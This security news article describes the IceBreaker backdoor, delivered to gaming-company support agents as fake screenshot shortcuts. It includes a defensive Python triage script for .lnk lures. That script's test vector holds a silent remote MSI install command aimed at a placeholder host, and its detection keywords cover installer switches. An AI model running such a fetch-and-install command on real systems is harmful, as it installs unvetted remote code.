Thursday, March 28, 2024

Hackers Use New IceBreaker Malware to Hack Gaming Companies


Once again social engineering is in play; this time the attackers are fooling support agents.

Hackers have targeted online game development companies with a previously unseen backdoor that researchers have dubbed “IceBreaker”.

Incident response specialists Security Joes believe that the IceBreaker backdoor is delivered through “a very specific social engineering technique.” The method is based on deceiving support agents. An attacker pretends to be a user who has encountered a problem and sends a malicious “screenshot” to an employee in a chat. The employee has little choice but to download and open the file, because they need to help the user. This is how the support agent infects their own computer with the malware.



IceBreaker Distribution and Activation Scheme (Security Joes)

The name of the group behind these attacks is still unknown. However, according to Security Joes, this group has been using this approach since at least September 2022. So far, the only public evidence of IceBreaker being used is a Twitter post from MalwareHunterTeam in October.

The malicious image is usually hosted on a fake website that imitates one of the popular image-hosting services, although the researchers also saw malicious screenshots stored in ordinary Dropbox storage.

The “image” itself is actually a malicious “.lnk” file: an ordinary Windows shortcut whose parameters carry the malicious command.



Shortcut disguised as a “.jpg” image

As you can see in the image above, the shortcut icon has been changed to look innocuous. The shortcut contains a command that downloads a payload in “.msi” format from the attacker’s server, installs it silently and launches it without showing any user interface.
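A defender-side triage helper for the lure described above, added here as an example (it is not Security Joes’ tooling). It walks just enough of the Windows Shell Link (.lnk) binary format to recover the shortcut’s command-line arguments, then flags the traits the report names: an image-looking file name, shortcut content behind an image extension, and a silent MSI installation. The sample shortcut is constructed in the block (placeholder URL, no link target, so it does nothing if opened) purely as a test vector.

```python
import struct

# ShellLinkHeader: HeaderSize 0x4C followed by the Shell Link CLSID (MS-SHLLINK 2.1)
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80   # LinkFlags bits
STRING_FIELDS = ((0x04, "name"), (0x08, "relpath"), (0x10, "workdir"),
                 (0x20, "args"), (0x40, "icon"))               # StringData order
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif", ".bmp")


def parse_lnk_strings(data: bytes) -> dict:
    """Walk a .lnk far enough to return its StringData fields (args, icon, ...)."""
    if not data.startswith(LNK_MAGIC):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76                                   # end of the fixed-size header
    if flags & HAS_ID_LIST:                    # LinkTargetIDList: u16 size + body
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                  # LinkInfo: u32 size counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    out = {}
    for bit, key in STRING_FIELDS:             # u16 char count, then chars, no NUL
        if flags & bit:
            n = struct.unpack_from("<H", data, pos)[0]
            out[key] = data[pos + 2:pos + 2 + n * width].decode(codec)
            pos += 2 + n * width
    return out


def triage(filename: str, data: bytes) -> list:
    """Flag the lure traits from the report: image-like name, LNK body, silent MSI."""
    findings, lower = [], filename.lower()
    if lower.endswith(".lnk") and lower[:-4].endswith(IMAGE_EXTS):
        findings.append("double extension: shortcut named like an image")
    if data.startswith(LNK_MAGIC):
        if not lower.endswith(".lnk"):
            findings.append("Shell Link content behind a non-.lnk extension")
        args = parse_lnk_strings(data).get("args", "").lower()
        if "msiexec" in args or ".msi" in args:
            findings.append("shortcut invokes an MSI installer")
        if any(q in args for q in ("/qn", "/quiet", "/qb")):
            findings.append("installer run with a quiet / no-UI switch")
    return findings


def build_sample() -> bytes:
    """Constructed test vector: header + args + icon only (placeholder URL, no target)."""
    def sd(text):                              # one Unicode StringData entry
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    header = LNK_MAGIC + struct.pack("<I", 0x20 | 0x40 | IS_UNICODE) + bytes(52)
    return header + sd("msiexec /i https://placeholder.invalid/shot.msi /qn") + sd("shell32.dll")
```

Running `triage("screenshot.jpg.lnk", build_sample())` reports all three traits; the same check against a real JPEG header returns nothing.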

The installer then extracts the malicious application “Port.exe”, a 64-bit C++ executable, into “AppData\Local\Temp”.



Port.exe File Properties

After a thorough analysis, Security Joes specialists found that the sample is a completely new backdoor written in Node.js. It gives attackers the following capabilities:

  • extending the backdoor with plugins that add to its built-in functions;
  • adding the backdoor to Windows startup for persistence;
  • enumerating Windows processes;
  • stealing passwords and cookies from local storage, in particular from Google Chrome;
  • enabling a SOCKS5 reverse proxy;
  • uploading files to a remote server via WebSockets;
  • running custom VBS scripts;
  • taking screenshots;
  • opening remote shell sessions.

If the target organization runs customer support itself rather than outsourcing it to an external provider, the attackers can use the backdoor to steal credentials, move laterally through the internal network and expand their foothold in it.

Not much is currently known about IceBreaker, but Security Joes decided to publish this report and share all indicators of compromise (IoCs) they found, so that antivirus vendors can learn to identify and remediate the threat in a timely manner.

Source: www.securitylab.ru
